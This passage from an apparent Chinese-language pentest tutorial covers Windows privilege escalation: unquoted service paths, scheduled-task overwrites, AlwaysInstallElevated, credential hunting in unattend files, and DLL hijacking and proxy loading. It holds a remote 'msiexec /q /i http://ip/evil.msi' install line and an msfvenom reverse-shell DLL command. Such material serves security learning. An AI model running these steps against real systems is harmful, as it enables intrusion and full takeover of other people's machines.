</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">wmic service get name,displayname,pathname,startmode<span class="p">|</span>findstr /i <span class="s2">&#34;Auto&#34;</span> <span class="p">|</span>findstr /i /v <span class="s2">&#34;C:\Windows\&#34; |findstr/i /v &#34;&#34;&#34;</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127115840.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127115840.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127115840.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127115840.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127115840.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127115840.png-water_print" /></p>
<h4 id="322-利用">3.2.2 利用</h4>
<p>接着查看是否有对目标文件夹的写权限，使用 Windows 内置工具 icacls，以此检查各级路径：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">icacls <span class="s2">&#34;C:&#34;</span>
</span></span><span class="line"><span class="cl">icacls <span class="s2">&#34;C:\Program Files&#34;</span>
</span></span><span class="line"><span class="cl">icacls <span class="s2">&#34;C:\Program Files\VMware&#34;</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>依次查看各级目录是否有可写权限，最后找到 C:\Program Files\VMware 目录，在该目录下方式木马，上线后，即为高权限。</p>
<h4 id="333-msf-中的模块">3.3.3 msf 中的模块</h4>
<p><code>exploit/windows/local/trusted_service_path</code> 模块</p>
<h3 id="33-计划任务提权">3.3 计划任务提权</h3>
<p>如果攻击者对以高权限运行的计划任务所在目录具有所写权限，就可以使用恶意程序覆盖原来的程序，这样，在计划任务下次执行时就会以高权限来运行恶意程序。</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-powershell" data-lang="powershell"><span class="line"><span class="cl"><span class="nb">Get-ScheduledTask</span> <span class="p">|</span> <span class="nb">Select </span><span class="p">*</span> <span class="p">|</span> <span class="p">?</span> <span class="p">{(</span><span class="nv">$_</span><span class="p">.</span><span class="n">TaskPath</span> <span class="o">-notlike</span> <span class="s2">&#34;\Microsoft\Windows\*&#34;</span><span class="p">)</span> <span class="o">-And</span> <span class="p">(</span><span class="nv">$_</span><span class="p">.</span><span class="n">Principal</span><span class="p">.</span><span class="n">UserId</span> <span class="o">-notlike</span> <span class="s2">&#34;*$env:UserName*&#34;</span><span class="p">)}</span> <span class="p">|</span> <span class="nb">Format-Table</span> <span class="n">-Property</span> <span class="n">State</span><span class="p">,</span> <span class="n">Actions</span><span class="p">,</span> <span class="n">Date</span><span class="p">,</span> <span class="n">TaskPath</span><span class="p">,</span> <span class="n">TaskName</span><span class="p">,</span> <span class="p">@{</span><span class="n">Name</span><span class="p">=</span><span class="s2">&#34;User&#34;</span><span class="p">;</span><span class="n">Expression</span><span class="p">={</span><span class="nv">$_</span><span class="p">.</span><span class="n">Principal</span><span class="p">.</span><span class="n">userID</span><span class="p">}}</span> 
</span></span></code></pre></td></tr></table>
</div>
</div><p>查看某个目录的权限配置情况</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">accesschk64.exe -dqv <span class="s2">&#34;/path/to/dir&#34;</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>如果攻击者对某个高权限的计划任务所在的路径有可写权限，可使用恶意程序覆盖原来的程序，当计划任务下次执行时，就会以高权限运行恶意程序。</p>
<h2 id="4-alwaysinstallelevated-提权">4 AlwaysInstallElevated 提权</h2>
<p>注册表键 AlwaysInstallElevated 是一个策略设置项，Window 允许低权限用户以 System 权限运行 MSI 安装文件，如果启用此策略设置项，那么任何权限的用户都能以 <code>NT AUTHORITY\SYSTEM</code> 权限来运行恶意的 MSI 文件</p>
<h3 id="41-查询">4.1 查询</h3>
<p>查询：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">reg query HKCU<span class="se">\S</span>OFTWARE<span class="se">\P</span>olicies<span class="se">\M</span>icrosoft<span class="se">\W</span>indows<span class="se">\I</span>nstaller /v AlwaysInstallElevated
</span></span><span class="line"><span class="cl">reg query HKLM<span class="se">\S</span>OFTWARE<span class="se">\P</span>olicies<span class="se">\M</span>icrosoft<span class="se">\W</span>indows<span class="se">\I</span>nstaller /v AlwaysInstallElevated
</span></span></code></pre></td></tr></table>
</div>
</div><p>未启用 AlwaysInstallElevated 策略，返回结果为：「找不到指定的注册表项或值」</p>
<h3 id="42-开启">4.2 开启</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">reg add HKCU<span class="se">\S</span>OFTWARE<span class="se">\P</span>olicies<span class="se">\M</span>icrosoft<span class="se">\W</span>indows<span class="se">\I</span>nstaller /v AlwaysInstallElevated /t REG_DWORD /d <span class="m">1</span>
</span></span><span class="line"><span class="cl">reg add HKLM<span class="se">\S</span>OFTWARE<span class="se">\P</span>olicies<span class="se">\M</span>icrosoft<span class="se">\W</span>indows<span class="se">\I</span>nstaller /v AlwaysInstallElevated /t REG_DWORD /d <span class="m">1</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h3 id="43-执行-msi-文件">4.3 执行 MSI 文件</h3>
<p>本地执行：<code>msiexec /q /i C:\msi.msi</code></p>
<ul>
<li>
<p>/i 参数用来表示安装操作</p>
</li>
<li>
<p>/q 参数用来隐藏安装界面</p>
</li>
</ul>
<p>并且 MSIEXEC 也可以实现无落地文件的方式进行木马上线的方式，当然低权限用不了，因为 msi 文件需要可信的证书才能远程利用 AlwaysInstallElevated 提权：<code>msiexec /q /i http://ip/evil.msi</code></p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210128111128.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210128111128.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210128111128.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210128111128.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210128111128.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210128111128.png-water_print" /></p>
<h3 id="44-利用">4.4 利用</h3>
<h4 id="441-powerup-脚本">4.4.1 PowerUP 脚本</h4>
<p><a href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1" target="_blank" rel="noopener noreffer">https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1</a></p>
<p>测试是否启用 AlwaysInstallElevated：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-powershell" data-lang="powershell"><span class="line"><span class="cl"><span class="nb">Import-Module</span> <span class="p">.\</span><span class="n">PowerUp</span><span class="p">.</span><span class="n">ps1</span>
</span></span><span class="line"><span class="cl"><span class="nb">Get-RegistryAlwaysInstallElevated</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>返回 True 代表开启。</p>
<h4 id="442-msi-wrapper-添加用户">4.4.2 MSI Wrapper 添加用户</h4>
<p>MSI Wrapper 下载地址：<a href="https://www.exemsi.com/download/" target="_blank" rel="noopener noreffer">https://www.exemsi.com/download/</a></p>
<p>将 Payload 设置为执行 ProcessHacker：</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210128111410.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210128111410.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210128111410.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210128111410.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210128111410.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210128111410.png-water_print" /></p>
<p>运行时要求提升权限：</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210128111451.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210128111451.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210128111451.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210128111451.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210128111451.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210128111451.png-water_print" /></p>
<p>MSI installation context 下选择 Per User 和 Per Machine 都可以。</p>
<h2 id="5-无人值守安装文件">5 无人值守安装文件</h2>
<p>一些 windows 无人值守安装文件中含有用户的明文或 base64 编码后的密文</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">dir /s *sysprep.inf *sysprep.xml *unattend.xml *unattend.txt 2&gt;nul
</span></span></code></pre></td></tr></table>
</div>
</div><p>常见位置：</p>
<ul>
<li>C:\sysprep.inf</li>
<li>C:\sysprep\sysprep.xml</li>
<li>C:\Windows\system32\sysprep.inf</li>
<li>C:\Windows\system32\sysprep\sysprep.xml</li>
<li>C:\Windows\Panther\Unattend\Unattended.xml</li>
<li>C:\Windows\Panther\Unattend\Unattend.xml</li>
<li>C:\Windos\System32\sysprep\unattend.xml</li>
<li>C:\Windows\System32\Sysprep\Panther\unattend.xml</li>
</ul>
<h2 id="6-dll-劫持提权">6 DLL 劫持提权</h2>
<h3 id="61-相关概念">6.1 相关概念</h3>
<h4 id="611-dll-简介">6.1.1 DLL 简介</h4>
<div class="details admonition question open">
        <div class="details-summary admonition-title">
            <i class="icon fas fa-question-circle fa-fw"></i>何为劫持<i class="details-icon fas fa-angle-right fa-fw"></i>
        </div>
        <div class="details-content">
            <div class="admonition-content">在正常事物发生之前进行一个旁路操作</div>
        </div>
    </div>
<p>动态链接库(Dynamic-Link-Library，缩写 dll)。在 Windows 中，许多应用程序并不是一个完整的可执行文件，它们被分割成一些相对独立的动态链接库，即 DLL 文件，放置于系统中。当执行某一个程序时，相应的 DLL 文件就会被调用。一个应用程序可使用多个 DLL 文件，一个 DLL 文件也可能被不同的应用程序使用，这样的 DLL 文件被称为共享 DLL 文件。</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190109094454.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190109094454.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190109094454.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190109094454.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190109094454.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190109094454.png-water_print" /></p>
<h4 id="612-dll-的加载顺序">6.1.2 DLL 的加载顺序</h4>
<blockquote>
<p>微软的 DLL 劫持分为三个阶段</p>
</blockquote>
<ul>
<li>无保护阶段：Windows XP SP2 之前</li>
<li>保护阶段：Windows XP SP2 之后，Windows 7 之前</li>
<li>进一步保护阶段：Windows 7 之后</li>
</ul>
<blockquote>
<p>Windows XP SP2 之前</p>
</blockquote>
<ol>
<li>进程对应的应用程序所在目录；</li>
<li>加载 DLL 时所在的当前目录 (SetCurrentDirectory)；</li>
<li>系统目录即 SYSTEM32 目录（通过 GetSystemDirectory 获取）；</li>
<li>16 位系统目录即 SYSTEM 目录；</li>
<li>Windows 目录：C:\Windows（通过 GetWindowsDirectory 获取）；</li>
<li>PATH 环境变量中的各个目录；</li>
</ol>
<blockquote>
<p>Windows XP SP2 之后</p>
</blockquote>
<p>微软为了防止 DLL 劫持漏洞的产生，在 XP SP2 之后，添加了一个 SafeDllSearchMode 的注册表属性。注册表路径如下：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDllSearchMode
</span></span></code></pre></td></tr></table>
</div>
</div><p>当 SafeDllSearchMode 的值设置为 1，即安全 DLL 搜索模式开启时，查找 DLL 的目录顺序如下：</p>
<ol>
<li>应用程序所在目录；</li>
<li>系统目录 SYSTEM32 目录；</li>
<li>16 位系统目录即 SYSTEM 目录。该项只是为了向前兼容的处理，可以不考虑</li>
<li>Windows 目录。通常是C:\Windows；</li>
<li>加载 DLL 时所在的当前目录；</li>
<li>环境变量 PATH 中所有目录。需要注意的是，这里不包括 App Paths 注册表项指定的应用程序路径。</li>
</ol>
<blockquote>
<p>win7 之后</p>
</blockquote>
<p>微软为了更进一步的防御系统的 DLL 被劫持，将一些容易被劫持的系统 DLL 写进了一个注册表项中，<strong>那么凡是此项下的 DLL 文件就会被禁止从 EXE 自身所在的目录下调用</strong>，而只能从系统目录即 SYSTEM32 目录下调用。注册表路径如下：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs
</span></span></code></pre></td></tr></table>
</div>
</div><p>Windows 操作系统通过「DLL路径搜索目录顺序」和「Know DLLs注册表项」的机制来确定应用程序所要调用的 DLL 的路径，之后，应用程序就将 DLL 载入了自己的内存空间，执行相应的函数功能。</p>
<p>注册表路径：<code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs</code></p>
<h4 id="613-分析-dll-的加载过程---process-monitor">6.1.3 分析 DLL 的加载过程 - Process Monitor</h4>
<p>Process Monitor 是 Windows 的高级监视工具，可显示实时文件系统，注册表和进程/线程活动。</p>
<p><a href="https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-utilities" target="_blank" rel="noopener noreffer">https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-utilities</a></p>
<p>Process Monitor Filter 是用于过滤应用程序输出的一部分功能，可以使得进程事件结果成为你想要的内容。常用过滤条件：Process Name，Path，Result</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190102100516.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190102100516.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190102100516.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190102100516.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190102100516.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190102100516.png-water_print" /></p>
<p>设置 Process Name is 待测目标，设置 Path ends with <code>.dll</code>，Result is <code>NAME NOT FOUND</code></p>
<h4 id="614-dll-劫持步骤">6.1.4 DLL 劫持步骤</h4>
<p>如果在应用程序寻找成功之前，将我们自己创造的 DLL 文件放入寻找目录中，那么应用程序就会加载我们自己的 DLL</p>
<h3 id="62-实现">6.2 实现</h3>
<h4 id="621-实现一个-dll-劫持">6.2.1 实现一个 DLL 劫持</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span><span class="lnt">7
</span><span class="lnt">8
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-c++" data-lang="c++"><span class="line"><span class="cl"><span class="n">BOOL</span> <span class="n">WINAPI</span> <span class="nf">DllMain</span><span class="p">(</span> 
</span></span><span class="line"><span class="cl"><span class="c1">// 指向自身的句柄
</span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="n">_In_</span> <span class="n">HINSTANCE</span> <span class="n">hinstDLL</span><span class="p">,</span> 
</span></span><span class="line"><span class="cl"><span class="c1">// 调用原因
</span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="n">_In_</span> <span class="n">DWORD</span>     <span class="n">fdwReason</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="c1">// 加载方式（隐式、显式）
</span></span></span><span class="line"><span class="cl"><span class="c1"></span>  <span class="n">_In_</span> <span class="n">LPVOID</span>    <span class="n">lpvReserved</span>
</span></span><span class="line"><span class="cl"><span class="p">);</span>
</span></span></code></pre></td></tr></table>
</div>
</div><table>
<thead>
<tr>
<th style="text-align:center">载入状态</th>
<th style="text-align:center">值</th>
<th style="text-align:center">说明</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:center">DLL_PROCESS_ATTACH</td>
<td style="text-align:center">1</td>
<td style="text-align:center">被进程装载时</td>
</tr>
<tr>
<td style="text-align:center">DLL_PROCESS_DETACH</td>
<td style="text-align:center">0</td>
<td style="text-align:center">被进程卸载时</td>
</tr>
<tr>
<td style="text-align:center">DLL_THREAD_ATTACH</td>
<td style="text-align:center">2</td>
<td style="text-align:center">被线程装载时</td>
</tr>
<tr>
<td style="text-align:center">DLL_THREAD_DETACH</td>
<td style="text-align:center">3</td>
<td style="text-align:center">被线程卸载时</td>
</tr>
</tbody>
</table>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-c++" data-lang="c++"><span class="line"><span class="cl"><span class="n">BOOL</span> <span class="n">APIENTRY</span> <span class="nf">DllMain</span><span class="p">(</span><span class="n">HANDLE</span> <span class="n">hModule</span><span class="p">,</span> <span class="n">DWORD</span> <span class="n">ul_reason_for_call</span><span class="p">,</span> <span class="n">LPVOID</span> <span class="n">lpReserved</span><span class="p">){</span>
</span></span><span class="line"><span class="cl">  <span class="n">printf</span><span class="p">(</span><span class="s">&#34;hModule.%p lpReserved.%p </span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">hModule</span><span class="p">,</span> <span class="n">lpReserved</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">  <span class="k">switch</span> <span class="p">(</span><span class="n">ul_reason_for_call</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">  <span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="k">case</span> <span class="nl">DLL_PROCESS_ATTACH</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">      <span class="n">printf</span><span class="p">(</span><span class="s">&#34;Process attach. </span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">      <span class="k">break</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">case</span> <span class="nl">DLL_PROCESS_DETACH</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">    	<span class="n">printf</span><span class="p">(</span><span class="s">&#34;Process detach. </span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    	<span class="k">break</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">case</span> <span class="nl">DLL_THREAD_ATTACH</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">    	<span class="n">printf</span><span class="p">(</span><span class="s">&#34;Thread attach. </span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    	<span class="k">break</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">case</span> <span class="nl">DLL_THREAD_DETACH</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">    	<span class="n">printf</span><span class="p">(</span><span class="s">&#34;Thread detach. </span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    	<span class="k">break</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="k">return</span> <span class="p">(</span><span class="n">TRUE</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>如果应用程序调用的 DLL 没有 DLLMain 函数就需要实现指定导出函数，然后等待导出函数执行完毕再 Load 真实 DLL。</p>
<h4 id="622-msf">6.2.2 msf</h4>
<p>MSF 生成 payload：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">msfvenom -p windows/meterpreter/reverse_tcp <span class="nv">LHOST</span><span class="o">=</span>IP <span class="nv">LPORT</span><span class="o">=</span><span class="m">4444</span> -f dll &gt; a.dll
</span></span></code></pre></td></tr></table>
</div>
</div><h3 id="63-自动化工具检测">6.3 自动化工具检测</h3>
<h4 id="631-rattler">6.3.1 rattler</h4>
<p><a href="https://github.com/sensepost/rattler" target="_blank" rel="noopener noreffer">https://github.com/sensepost/rattler</a></p>
<p>实现思路：</p>
<ul>
<li>枚举进程调用的 dll 列表，解析出 dll 的名称</li>
<li>将测试 dll 分别重命名为列表中的 dll 名称</li>
<li>再次启动程序，检测是否成功创建进程 calc.exe，如果成功，代表存在漏洞，否则不存在</li>
</ul>
<p>测试：</p>
<p>使用 Visual Studio 编译 Rattler，将 payload.dll 放于同级目录下</p>
<p>payload.dll 下载地址：</p>
<p><a href="https://github.com/sensepost/rattler/releases/download/v1.0/payload.dll" target="_blank" rel="noopener noreffer">https://github.com/sensepost/rattler/releases/download/v1.0/payload.dll</a></p>
<p>管理员权限的 cmd 下运行命令：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Rattler.exe <span class="o">[</span>待检测程序名称<span class="o">]</span> <span class="m">1</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="632-chkdllhijack">6.3.2 ChkDllHijack</h4>
<p>使用 windbg 导出 module：</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190102103743.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190102103743.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190102103743.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190102103743.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190102103743.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190102103743.png-water_print" /></p>
<p>打开 chkDllHijack，粘贴处要验证的 DLL 内容，等待其运行完毕，检查结果：</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20100102103944.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20100102103944.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20100102103944.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20100102103944.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20100102103944.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20100102103944.png-water_print" /></p>
<h3 id="64-dll-side-loadingdll-proxy-loading">6.4 DLL Side-Loading(DLL Proxy Loading)</h3>
<h4 id="641-原理">6.4.1 原理</h4>
<blockquote>
<p>不使应用程序崩溃的情况下利用 DLL Hijack 漏洞。将合法函数调用重定向到原始 DLL，在后台静默加载我们的 shellcode。</p>
</blockquote>
<p>DLL Side-Loading 与 DLL 劫持非常相似。但是，它不会破坏原始程序的执行流程或功能。，将恶意程序隐藏在合法应用程序之后，同时也可以利用该方法维持权限。</p>
<p>DLL Proxy 流程图：</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200702110923.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200702110923.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200702110923.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200702110923.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200702110923.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200702110923.png-water_print" /></p>
<ul>
<li>启动时，应用程序 A 需要使用名为 GetFunkyData() 的第三方函数来获取数据，GetFunkyData() 存在于动态链接库中，该动态链接库位于应用程序的工作目录中，名为 DataFunctions_Original.dll (B)。</li>
<li>应用程序 A 以其名称加载库 DataFunctions.dll，以尝试执行 GetFunkyData()。 该 DLL 实际上是攻击者专门设计的“代理”库，代理 DLL 使用将函数调用重定向到原始 DLL“ DataFunctions_Original.dll”（B）。</li>
<li>此时，攻击者已经劫持了执行流程（C），并且可以代表运行中的进程（E）执行代码，而无需用户或应用程序的了解。</li>
</ul>
<h4 id="642-利用">6.4.2 利用</h4>
<p><a href="https://github.com/Flangvik/SharpDllProxy" target="_blank" rel="noopener noreffer">https://github.com/Flangvik/SharpDllProxy</a></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">SharpDllProxy.exe --dll /path/to/targetDLL.dll --payload shellcode.bin
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200701114359.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200701114359.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200701114359.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200701114359.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200701114359.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200701114359.png-water_print" /></p>
<p>现在需要将程序生成的源码进行编译，打开 VS 2019，选择创建新工程：</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200701114616.png-water_print"
